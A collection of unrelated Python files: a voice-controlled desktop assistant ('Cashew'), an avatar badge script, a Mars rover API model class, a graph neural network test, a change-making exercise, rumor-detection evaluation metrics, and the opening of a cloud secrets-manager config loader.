args=(ids, 1024),
output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)),
tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32))
).repeat(2)
for _ in ds:
pass
if __name__ == "__main__":
main()
|
import speech_recognition as sr
import webbrowser
import wikipedia
import requests
import pyttsx3
import urllib
import random
import json
import lxml
import math
import time
import bs4
import os
from nltk.corpus import wordnet as wn
from bs4 import BeautifulSoup as soup
from time import gmtime, strftime
from googlesearch import search
from pygame import mixer
from yr.libyr import Yr
from lxml import etree
os.system('cls' if os.name == 'nt' else 'clear')
engine = pyttsx3.init()
engine.setProperty('rate', 140)
weather = Yr(location_name='South_Africa/KwaZulu-Natal/Durban/') #Fill in your own location. More help in readme.md
r = sr.Recognizer()
r.dynamic_energy_threshold = False
engine.say("I am cashew, a TTS Virtual assistant, clap before talking so I can hear you, say cashew to turn me on")
engine.runAndWait()
microphone_index = 2 #Change this to whatever audio channel your microphone is on.
def onnoise():
mixer.init()
mixer.music.load(r"Robot_blip-Marianne_Gagnon-120342607.ogg") #Change this location to where ever the sound files are located
mixer.music.play()
def offnoise():
mixer.init()
mixer.music.load(r"Robot_blip_2-Marianne_Gagnon-299056732.ogg") #Change this to where ever the sound files are located
mixer.music.play()
try:
while True:
wake = ""
w = sr.Recognizer()
w.dynamic_energy_threshold = True
speech5 = sr.Microphone(device_index=microphone_index)
with speech5 as source:
oaudio = w.listen(source)
w.adjust_for_ambient_noise(source)
try:
wake = w.recognize_google(oaudio, language = 'en-US')
except sr.UnknownValueError:
pass
except sr.WaitTimeoutError:
pass
if "cashew" in wake:
onnoise()
while True:
try:
r = sr.Recognizer()
r.dynamic_energy_threshold = False
speech = sr.Microphone(device_index=microphone_index)
with speech as source:
audio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
recog = r.recognize_google(audio, language = 'en-US')
if "search" in recog:
engine.say("Sure. What do you want me to search?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
engine.say(wikipedia.summary(query))
engine.runAndWait()
break
if "Bing" in recog:
engine.say("Sure. What do you want me to search on bing?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
search = query.replace(" ", "+")
webbrowser.open("https://www.bing.com/search?q=" + search)
break
elif "play" in recog:
engine.say("Sure. What do you want me to play?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
engine.say("Sure. Searching for" + query)
engine.runAndWait()
for j in search(query, tld="co.in", num=True==True, stop=0, pause=2):
if "/watch?v=" in j:
url = j
youtube = etree.HTML(urllib.request.urlopen(url).read())
video_title = youtube.xpath("//span[@id='eow-title']/@title")
title = ''.join(video_title)
if "reaction" in query:
engine.say("Now playing" + title)
engine.runAndWait()
webbrowser.open(url)
break
else:
if "reaction" not in title:
if "REACTION" not in title:
if "Reaction" not in title:
engine.say("Now playing" + title)
engine.runAndWait()
webbrowser.open(url)
break
break
elif "time" in recog:
tim = strftime("%H:%M:%S")
engine.say("The current time is" + tim)
engine.runAndWait()
break
elif "spell" in recog:
engine.say("Sure. What do you want me to spell?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
speeling = list(query)
spelling = str(speeling)
engine.say(query + ", is spelled:" + spelling)
engine.runAndWait()
break
elif "define" in recog:
try:
engine.say("Sure. What word's definition do you want to know?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
word = wn.synsets(query)
defi = word[0].definition()
engine.say("The definition of " + query + " is " + defi)
engine.runAndWait()
break
except IndexError:
engine.say("I could not find a definition for " + defi)
engine.runAndWait()
break
elif "synonym" in recog:
try:
engine.say("Sure. What word do you want a synonym for?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
word = query
synonyms = []
antonyms = []
for syn in wn.synsets(word):
for l in syn.lemmas():
synonyms.append(l.name())
if l.antonyms():
antonyms.append(l.antonyms()[0].name())
if synonyms != []:
engine.say("Some synonyms for " + word + " are " + str(synonyms))
engine.runAndWait()
break
else:
engine.say("I could not find synonyms for " + word)
engine.runAndWait()
break
except:
pass
elif "antonym" in recog:
try:
engine.say("Sure. What word do you want an antonym for?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
word = query
synonyms = []
antonyms = []
for syn in wn.synsets(word):
for l in syn.lemmas():
synonyms.append(l.name())
if l.antonyms():
antonyms.append(l.antonyms()[0].name())
if antonyms != []:
engine.say("Some antonyms for " + word + " are " + str(antonyms))
engine.runAndWait()
break
else:
engine.say("I could not find antonyms for " + word)
engine.runAndWait()
break
except:
pass
elif "where" in recog:
engine.say("Sure. What location do you want to know?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
search = query.replace(" ", "+")
webbrowser.open("https://www.google.co.za/maps/search/" + search)
break
elif "weather" in recog:
now = weather.now(as_json=False)
overtemp = now['temperature']
tempunit = overtemp['@unit']
tempvalue = overtemp['@value']
oversky = now['symbol']
skycon = oversky['@name']
overrain = now['precipitation']
rainvalue = overrain['@value']
overwind = now['windDirection']
overwind2 = now['windSpeed']
winddirection = overwind['@name']
windspeed = overwind2['@mps']
windspeedname = overwind2['@name']
overpressure = now['pressure']
unit = overpressure['@unit']
pressure = overpressure['@value']
engine.say("The weather for the next four hours is as follows:")
engine.runAndWait()
engine.say("The temperature will be " + tempvalue + " degrees " + tempunit + " average.")
engine.runAndWait()
engine.say("With a " + skycon + ".")
engine.runAndWait()
engine.say("It will rain " + rainvalue + " millilitres in the next 4 hours.")
engine.runAndWait()
engine.say("The wind is " + windspeedname + ", blowing at " + windspeed + " meters per second going " + winddirection)
engine.runAndWait()
engine.say("The pressure is " + pressure + " heteropascles.")
engine.runAndWait()
break
elif "joke" in recog:
engine.say("Sure. What do you want the joke to be about? Say random for a random catagory.")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
try:
if "random" in query:
send_url = 'https://sv443.net/jokeapi/v2/joke/Any?blacklistFlags=nsfw,religious,political,racist,sexist'
r = requests.get(send_url)
j = json.loads(r.text)
error = j['error']
if j['type'] == "twopart":
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke1 = j['setup']
joke2 = j['delivery']
engine.say(joke1)
engine.runAndWait()
engine.say(joke2)
engine.runAndWait()
break
else:
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke = j['joke']
engine.say(joke)
engine.runAndWait()
break
else:
send_url = 'https://sv443.net/jokeapi/v2/joke/Any?blacklistFlags=nsfw,religious,political,racist,sexist&type=single&contains='
send_url2 = query
r = requests.get(send_url + send_url2)
j = json.loads(r.text)
error = j['error']
if j['type'] == "twopart":
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke1 = j['setup']
joke2 = j['delivery']
engine.say(joke1)
engine.runAndWait()
engine.say(joke2)
engine.runAndWait()
break
else:
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke = j['joke']
engine.say(joke)
engine.runAndWait()
break
except KeyError:
engine.say("No joke was found with that key word.")
engine.runAndWait()
break
elif "news" in recog:
news_url="https://news.google.com/news/rss"
Client=urllib.request.urlopen(news_url)
xml_page=Client.read()
Client.close()
soup_page=soup(xml_page,"xml")
news_list=soup_page.findAll("item")
for news in news_list:
engine.say("At " + news.pubDate.text + " The following story happened.")
engine.runAndWait()
engine.say(news.title.text)
engine.runAndWait()
engine.say("The source of this news is " + news.source.text)
engine.runAndWait()
break
engine.say("Would you like me to open the story up in your browser?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
if "yes" in query:
link = news.link.text
webbrowser.open(link)
break
else:
continue
break
elif "date" in recog:
tim = strftime("%Y-%m-%d")
engine.say("The current date is" + tim)
engine.runAndWait()
break
elif "off" in recog:
offnoise()
time.sleep(1)
try:
os.remove(r"D:\Users\cayde\Documents\Code\Python\.google-cookie")
exit()
except FileNotFoundError:
exit()
elif "credits" in recog:
engine.say("This was made by Cayden d W on GitHub! Would you like me to open his page?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
if "yes" in query:
webbrowser.open("https://github.com/CaydendW")
else:
break
break
elif "hello" in recog:
engine.say("Hello to you too!")
engine.runAndWait()
break
elif "hi" in recog:
engine.say("Hello to you too!")
engine.runAndWait()
break
elif "thank you" in recog:
engine.say("You're welcome!")
engine.runAndWait()
break
elif "coin" in recog:
coin = random.randint(1,2)
if coin==1:
engine.say("Heads")
engine.runAndWait()
break
else:
engine.say("Tails")
engine.runAndWait()
break
elif "dice" in recog:
engine.say("You rolled a " + str(random.randint(1,6)))
engine.runAndWait()
break
elif "0 / 0" in recog:
engine.say("I just.. I just what do i .. wha i.. ggfuspm i just. wfubhdnuhlihgvfbihgvybzsxcrdrrsv57helpme ..fgw6e7yesd5rfd68tgtwo7yjuokmc,,ioueuyrepq87ty89")
engine.runAndWait()
exit()
elif "cashew" in recog:
engine.say("Yes!? I'm listening...")
engine.runAndWait()
break
elif "yes" in recog:
engine.say("I'm glad something is going well.")
engine.runAndWait()
break
elif "help" in recog:
webbrowser.open("https://github.com/CaydendW/Cashew/blob/master/help.md")
break
else:
engine.say("Sorry but " + recog + "is not one of my commands. Say help to hear a list of commands.")
engine.runAndWait()
except sr.UnknownValueError:
continue
except sr.RequestError:
continue
except sr.WaitTimeoutError:
offnoise()
time.sleep(1)
try:
os.remove(r"D:\Users\cayde\Documents\Code\Python\.google-cookie")
break
except FileNotFoundError:
break
except KeyboardInterrupt:
offnoise()
time.sleep(1)
try:
os.remove(r".google-cookie")
exit()
except FileNotFoundError:
exit()
except KeyboardInterrupt:
offnoise()
time.sleep(1)
try:
os.remove(r".google-cookie")
exit()
except FileNotFoundError:
exit()
exit()
except:
engine.say("An unknown exception occured.")
|
from app import runWebsite
runWebsite()
|
# -*- coding: utf-8 -*-
# 将你的 QQ 头像(或者微博头像)右上角加上红色的数字,类似于微信未读信息数量那种提示效果。
from PIL import Image, ImageFont, ImageDraw
def add_num(img):
im = Image.open(img)
w, h = im.size
font = ImageFont.truetype('/usr/share/fonts/truetype/ubuntu-font-family/UbuntuMono-R.ttf', 30)
fillcolor = "#ff0000"
draw = ImageDraw.Draw(im)
draw.text((w - 20, 0), '1', font=font, fill=fillcolor)
im.save('r.jpg', 'jpeg')
if __name__ == '__main__':
add_num('1.jpg')
|
"""
MIT License
Copyright (c) 2021 mooncell07
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import annotations
from datetime import date, datetime
from typing import Optional, Mapping, Any
from .partialmanifest import PartialManifest
__all__ = ("Manifest",)
class Manifest(PartialManifest):
"""
A class representing a `Manifest`.
Attributes:
rover_id (Optional[int]): ID of the rover.
rover_name (str): Name of the Rover.
status (Optional[str]): The Rover's mission status.
max_sol (Optional[int]): The most recent Martian sol from which photos exist.
total_photos (Optiona[int]): Number of photos taken by that Rover.
cameras (Mapping[str, str]): Cameras for which there are photos by that Rover on that sol.
""" # noqa: E501
__slots__ = (
"max_sol",
"total_photos",
"cameras",
)
def __init__(self, data: Mapping[Any, Any]) -> None:
super().__init__(data)
self.max_sol: Optional[int] = data.get("max_sol")
self.total_photos: Optional[int] = data.get("total_photos")
self.cameras: Mapping[str, str] = data.get("cameras", {})
def __eq__(self, value: Any) -> bool:
"""
Checks if two objects are same using `rover_id`.
Returns:
Result of `obj == obj`.
"""
return isinstance(value, self.__class__) and value.rover_id == self.rover_id
@property
def max_date(self) -> date:
"""
The most recent Earth date from which photos exist.
Returns:
A [datetime.date][] object.
""" # noqa: E501
return datetime.date(
datetime.strptime(self._rover_info["max_date"], "%Y-%m-%d")
)
|
from dependency_injector import containers
from fdap.config.config import Config
from fdap.utils.customlogger import CustomLogger
from fdap.utils.loggeradapter import LoggerAdapter
from typing import Callable
class Application:
_container: containers.DeclarativeContainer
_logger: LoggerAdapter
def __init__(self, container: containers.DeclarativeContainer, callback: Callable = None):
self._logger = CustomLogger.logger('root', 'application')
self._container = container
self._container.config.from_dict(Config.all())
self._container.init_resources()
if callback is not None:
self.bootstrap(callback)
def get(self, name: str) -> any:
return self._container.providers.get(name)()
def bootstrap(self, callback: Callable):
try:
callback(self)
except Exception as e:
self._logger.error('Failed Bootstrapping...')
self._logger.error(e)
|
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import random
import numpy as np
import tensorflow as tf
from graphlearn.python.data.feature_spec import FeatureSpec
from graphlearn.python.nn.tf.model.ego_gin import EgoGIN
from graphlearn.python.nn.tf.model.ego_gin import HomoEgoGIN
from graphlearn.python.nn.tf.data.entity import Vertex
from graphlearn.python.nn.tf.data.ego_graph import EgoGraph
from graphlearn.python.nn.tf.layers.ego_gin_layer import EgoGINLayer
from graphlearn.python.nn.tf.layers.ego_gin_layer import EgoGINLayerGroup
class EgoGINTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
def test_homogeneous_graph(self):
spec = FeatureSpec(10)
for i in range(3):
spec.append_dense()
total_dim = 3
for i in range(7):
dim = random.randint(8, 10)
spec.append_sparse(20 + 10 * i, dim, False)
total_dim += dim
hops = [4, 5]
# the centric vertices share the same spec with 2-hop neighbors
schema = [("nodes", spec), ("nodes", spec), ("nodes", spec)]
# [f_num, batch_size] = [3, 2]
batch_floats = np.array([[1.0 * i, 2.0 * i] for i in range(3)])
batch_floats = tf.convert_to_tensor(batch_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2]
batch_ints = np.array([[i, 2 * i] for i in range(7)])
batch_ints = tf.convert_to_tensor(batch_ints, dtype=tf.int64)
vertices = Vertex(floats=batch_floats, ints=batch_ints)
# [f_num, batch_size] = [3, 2 * 4]
hop1_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] for i in range(3)])
hop1_floats = tf.convert_to_tensor(hop1_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2 * 4]
hop1_ints = np.array([[i, 2 * i] * hops[0] for i in range(7)])
hop1_ints = tf.convert_to_tensor(hop1_ints, dtype=tf.int64)
neighbor_hop_1 = Vertex(floats=hop1_floats, ints=hop1_ints)
# [f_num, batch_size] = [3, 2 * 4 * 5]
hop2_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] * hops[1] for i in range(3)])
hop2_floats = tf.convert_to_tensor(hop2_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2 * 4 * 5]
hop2_ints = np.array([[i, 2 * i] * hops[0] * hops[1] for i in range(7)])
hop2_ints = tf.convert_to_tensor(hop2_ints, dtype=tf.int64)
neighbor_hop_2 = Vertex(floats=hop2_floats, ints=hop2_ints)
g = EgoGraph(vertices, [neighbor_hop_1, neighbor_hop_2], schema, hops)
dims = np.array([total_dim, 16, 8])
model = HomoEgoGIN(
dims,
num_head=5,
bn_fn=None,
active_fn=tf.nn.relu,
droput=0.1)
embeddings = model.forward(g)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
sess.run(tf.global_variables_initializer())
ret = sess.run(embeddings)
self.assertListEqual([2, 8], list(ret.shape)) # [batch_size, output_dim]
def test_heterogeneous_graph(self):
u_spec = FeatureSpec(10)
for i in range(3):
u_spec.append_dense()
u_total_dim = 3
for i in range(7):
dim = random.randint(8, 10)
u_spec.append_sparse(20 + 10 * i, dim, False)
u_total_dim += dim
i_spec = FeatureSpec(19)
for i in range(6):
i_spec.append_dense()
i_total_dim = 6
for i in range(13):
dim = random.randint(8, 11)
i_spec.append_sparse(30 + 10 * i, dim, False)
i_total_dim += dim
u_out_dim = 16
i_out_dim = 12
out_dim = 9
hops = [4, 5]
# the centric vertices share the same spec with 2-hop neighbors
# metapath: u--i--i
schema = [("u_nodes", u_spec), ("nbr", i_spec), ("nbr", i_spec)]
# [f_num, batch_size] = [3, 2]
batch_floats = np.array([[1.0 * i, 2.0 * i] for i in range(3)])
batch_floats = tf.convert_to_tensor(batch_floats, dtype=tf.float32)
# [i_num, batch_size] = [7, 2]
batch_ints = np.array([[i, 2 * i] for i in range(7)])
batch_ints = tf.convert_to_tensor(batch_ints, dtype=tf.int64)
vertices = Vertex(floats=batch_floats, ints=batch_ints)
# [f_num, batch_size] = [6, 2 * 4]
hop1_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] for i in range(6)])
hop1_floats = tf.convert_to_tensor(hop1_floats, dtype=tf.float32)
# [i_num, batch_size] = [13, 2 * 4]
hop1_ints = np.array([[i, 2 * i] * hops[0] for i in range(13)])
hop1_ints = tf.convert_to_tensor(hop1_ints, dtype=tf.int64)
neighbor_hop_1 = Vertex(floats=hop1_floats, ints=hop1_ints)
# [f_num, batch_size] = [6, 2 * 4 * 5]
hop2_floats = np.array([[1.0 * i, 2.0 * i] * hops[0] * hops[1] for i in range(6)])
hop2_floats = tf.convert_to_tensor(hop2_floats, dtype=tf.float32)
# [i_num, batch_size] = [13, 2 * 4 * 5]
hop2_ints = np.array([[i, 2 * i] * hops[0] * hops[1] for i in range(13)])
hop2_ints = tf.convert_to_tensor(hop2_ints, dtype=tf.int64)
neighbor_hop_2 = Vertex(floats=hop2_floats, ints=hop2_ints)
g = EgoGraph(vertices, [neighbor_hop_1, neighbor_hop_2], schema, hops)
layer_ui = EgoGINLayer("heter_uv",
input_dim=(u_total_dim, i_total_dim),
output_dim=u_out_dim,
num_head=5)
layer_ii = EgoGINLayer("heter_ii",
input_dim=i_total_dim,
output_dim=i_out_dim,
num_head=5)
layer_uii = EgoGINLayer("heter_uii",
input_dim=(u_out_dim, i_out_dim),
output_dim=out_dim,
num_head=5)
layer_group_1 = EgoGINLayerGroup([layer_ui, layer_ii])
layer_group_2 = EgoGINLayerGroup([layer_uii])
model = EgoGIN(
[layer_group_1, layer_group_2],
bn_fn=None,
active_fn=tf.nn.relu,
droput=0.1)
embeddings = model.forward(g)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
sess.run(tf.global_variables_initializer())
ret = sess.run(embeddings)
self.assertListEqual([2, 9], list(ret.shape)) # [batch_size, output_dim]
if __name__ == "__main__":
unittest.main()
|
'''
(1) - Indique como um troco deve ser dado utilizando-se um número mínimo de notas. Seu
algoritmo deve ler o valor da conta a ser paga e o valor do pagamento efetuado desprezando
os centavos. Suponha que as notas para troco sejam as de 50, 20, 10, 5, 2 e 1 reais, e que
nenhuma delas esteja em falta no caixa
'''
valor_da_conta = float(input('Entre com o valor da conta: '))
troco = [50,20, 10, 5, 2, 1]
cont = 0
while valor_da_conta > 0:
n = valor_da_conta/troco[cont]
valor_da_conta = valor_da_conta%troco[cont]
if n != 0:
print('%d notas de R$ %.2f' %(n, troco[cont]))
cont += 1
#Logica: imprime o troco até chegar o valor da conta que foi digitado pelo "caixa"
|
# -*- coding: utf-8 -*-
"""
@object: weibo & twitter
@task: split train & test, evaluate performance
@author: majing
@variable: T,
@time: Tue Nov 10 16:29:42 2015
"""
import sys
import random
import os
import re
import math
import numpy as np
################## evaluation of model result #####################
def evaluation(prediction, y): ## no. of time series
TP = 0
TN = 0
FP = 0
FN = 0
e = 0.000001
threshhold = 0.5
fout = open(outevalPath, 'w')
for i in range(len(y)):
fout.write(str(y[i][0])+"\t"+str(prediction[i][0])+"\n")
if y[i][0] == 1 and prediction[i][0] >= threshhold:
TP += 1
if y[i][0] == 1 and prediction[i][0] < threshhold:
FN += 1
if y[i][0] == 0 and prediction[i][0] >= threshhold:
FP += 1
if y[i][0] == 0 and prediction[i][0] < threshhold:
TN += 1
fout.close()
accu = float(TP+TN)/(TP+TN+FP+FN+e)
prec_r = float(TP)/(TP+FP+e) ## for rumor
recall_r = float(TP)/(TP+FN+e)
F_r = 2 * prec_r*recall_r / (prec_r + recall_r+e)
prec_f = float(TN)/(TN+FN+e) ## for fact
recall_f = float(TN)/(TN+FP+e)
F_f = 2 * prec_f*recall_f / (prec_f + recall_f+e)
return [accu, prec_r, recall_r, F_r, prec_f, recall_f, F_f]
def evaluation_2class(prediction, y): # 4 dim
TP1, FP1, FN1, TN1 = 0, 0, 0, 0
TP2, FP2, FN2, TN2 = 0, 0, 0, 0
e, RMSE, RMSE1, RMSE2 = 0.000001, 0.0, 0.0, 0.0
for i in range(len(y)):
y_i, p_i = list(y[i]), list(prediction[i][0])
##RMSE
for j in range(len(y_i)):
RMSE += (y_i[j]-p_i[j])**2
RMSE1 += (y_i[0]-p_i[0])**2
RMSE2 += (y_i[1]-p_i[1])**2
## Pre, Recall, F
Act = str(y_i.index(max(y_i))+1)
Pre = str(p_i.index(max(p_i))+1)
## for class 1
if Act == '1' and Pre == '1': TP1 += 1
if Act == '1' and Pre != '1': FN1 += 1
if Act != '1' and Pre == '1': FP1 += 1
if Act != '1' and Pre != '1': TN1 += 1
## for class 2
if Act == '2' and Pre == '2': TP2 += 1
if Act == '2' and Pre != '2': FN2 += 1
if Act != '2' and Pre == '2': FP2 += 1
if Act != '2' and Pre != '2': TN2 += 1
## print result
Acc_all = round( float(TP1+TP2)/float(len(y)+e), 4 )
Prec1 = round( float(TP1)/float(TP1+FP1+e), 4 )
Recll1 = round( float(TP1)/float(TP1+FN1+e), 4 )
F1 = round( 2*Prec1*Recll1/(Prec1+Recll1+e), 4 )
Prec2 = round( float(TP2)/float(TP2+FP2+e), 4 )
Recll2 = round( float(TP2)/float(TP2+FN2+e), 4 )
F2 = round( 2*Prec2*Recll2/(Prec2+Recll2+e), 4 )
RMSE_all = round( ( RMSE/len(y) )**0.5, 4)
RMSE_all_1 = round( ( RMSE1/len(y) )**0.5, 4)
RMSE_all_2 = round( ( RMSE2/len(y) )**0.5, 4)
RMSE_all_avg = round( ( RMSE_all_1+RMSE_all_2 )/2, 4)
return [Acc_all, RMSE_all, RMSE_all_avg, 'C1:', Prec1, Prec1, Recll1, F1,'\n',
'C2:', Prec2, Prec2, Recll2, F2,'\n']
def evaluation_4class(prediction, y): # 4 dim
TP1, FP1, FN1, TN1 = 0, 0, 0, 0
TP2, FP2, FN2, TN2 = 0, 0, 0, 0
TP3, FP3, FN3, TN3 = 0, 0, 0, 0
TP4, FP4, FN4, TN4 = 0, 0, 0, 0
e, RMSE, RMSE1, RMSE2, RMSE3, RMSE4 = 0.000001, 0.0, 0.0, 0.0, 0.0, 0.0
for i in range(len(y)):
y_i, p_i = list(y[i]), list(prediction[i])
##RMSE
for j in range(len(y_i)):
RMSE += (y_i[j]-p_i[j])**2
RMSE1 += (y_i[0]-p_i[0])**2
RMSE2 += (y_i[1]-p_i[1])**2
RMSE3 += (y_i[2]-p_i[2])**2
RMSE4 += (y_i[3]-p_i[3])**2
## Pre, Recall, F
Act = str(y_i.index(max(y_i))+1)
Pre = str(p_i.index(max(p_i))+1)
#print y_i, p_i
#print Act, Pre
## for class 1
if Act == '1' and Pre == '1': TP1 += 1
if Act == '1' and Pre != '1': FN1 += 1
if Act != '1' and Pre == '1': FP1 += 1
if Act != '1' and Pre != '1': TN1 += 1
## for class 2
if Act == '2' and Pre == '2': TP2 += 1
if Act == '2' and Pre != '2': FN2 += 1
if Act != '2' and Pre == '2': FP2 += 1
if Act != '2' and Pre != '2': TN2 += 1
## for class 3
if Act == '3' and Pre == '3': TP3 += 1
if Act == '3' and Pre != '3': FN3 += 1
if Act != '3' and Pre == '3': FP3 += 1
if Act != '3' and Pre != '3': TN3 += 1
## for class 4
if Act == '4' and Pre == '4': TP4 += 1
if Act == '4' and Pre != '4': FN4 += 1
if Act != '4' and Pre == '4': FP4 += 1
if Act != '4' and Pre != '4': TN4 += 1
## print result
Acc_all = round( float(TP1+TP2+TP3+TP4)/float(len(y)+e), 4 )
Acc1 = round( float(TP1+TN1)/float(TP1+TN1+FN1+FP1+e), 4 )
Prec1 = round( float(TP1)/float(TP1+FP1+e), 4 )
Recll1 = round( float(TP1)/float(TP1+FN1+e), 4 )
F1 = round( 2*Prec1*Recll1/(Prec1+Recll1+e), 4 )
Acc2 = round( float(TP2+TN2)/float(TP2+TN2+FN2+FP2+e), 4 )
Prec2 = round( float(TP2)/float(TP2+FP2+e), 4 )
Recll2 = round( float(TP2)/float(TP2+FN2+e), 4 )
F2 = round( 2*Prec2*Recll2/(Prec2+Recll2+e), 4 )
Acc3 = round( float(TP3+TN3)/float(TP3+TN3+FN3+FP3+e), 4 )
Prec3 = round( float(TP3)/float(TP3+FP3+e), 4 )
Recll3 = round( float(TP3)/float(TP3+FN3+e), 4 )
F3 = round( 2*Prec3*Recll3/(Prec3+Recll3+e), 4 )
Acc4 = round( float(TP4+TN4)/float(TP4+TN4+FN4+FP4+e), 4 )
Prec4 = round( float(TP4)/float(TP4+FP4+e), 4 )
Recll4 = round( float(TP4)/float(TP4+FN4+e), 4 )
F4 = round( 2*Prec4*Recll4/(Prec4+Recll4+e), 4 )
microF = round( (F1+F2+F3+F4)/4,5 )
RMSE_all = round( ( RMSE/len(y) )**0.5, 4)
RMSE_all_1 = round( ( RMSE1/len(y) )**0.5, 4)
RMSE_all_2 = round( ( RMSE2/len(y) )**0.5, 4)
RMSE_all_3 = round( ( RMSE3/len(y) )**0.5, 4)
RMSE_all_4 = round( ( RMSE4/len(y) )**0.5, 4)
RMSE_all_avg = round( ( RMSE_all_1+RMSE_all_2+RMSE_all_3+RMSE_all_4 )/4, 4)
return ['acc:', Acc_all, 'Favg:',microF, RMSE_all, RMSE_all_avg,
'C1:',Acc1, Prec1, Recll1, F1,
'C2:',Acc2, Prec2, Recll2, F2,
'C3:',Acc3, Prec3, Recll3, F3,
'C4:',Acc4, Prec4, Recll4, F4]
def write2Predict_oneVSall(prediction, y, resultPath): ## no. of time series
fout = open(resultPath, 'w')
for i in range(len(y)):
fout.write(str(prediction[i][0])+"\n")
fout.close()
def write2Predict_4class(prediction, y, resultPath): ## no. of time series
fout = open(resultPath, 'w')
for i in range(len(y)):
data1 = str(y[i][0])+' '+str(y[i][1])+' '+str(y[i][2])+' '+str(y[i][3])
data2 = str(prediction[i][0])+' '+str(prediction[i][1])+' '+str(prediction[i][2])+' '+str(prediction[i][3])
fout.write(data1+'\t'+data2+"\n")
fout.close()
#################################### MAIN ##############################################
|
from src.gui.Server import Server
server = Server()
|
import json
from alibaba_cloud_secretsmanager_client.model.client_key_credentials import ClientKeyCredential
from alibaba_cloud_secretsmanager_client.model.credentials_properties import CredentialsProperties
from alibaba_cloud_secretsmanager_client.model.region_info import RegionInfo
from aliyunsdkcore.auth import credentials
from alibaba_cloud_secretsmanager_client.utils import config_utils, const, env_const, client_key_utils
def check_config_param(param, param_name):
if param == "" or param is None:
raise ValueError("credentials config missing required parameters[%s]" % param_name)
def load_credentials_properties(file_name):
if file_name is None or file_name == "":
file_name = const.DEFAULT_CONFIG_NAME
config_dict = config_utils.Properties(file_name).get_properties()
credential = None
region_info_list = []
secret_name_list = []
if config_dict is not None and len(config_dict) > 0:
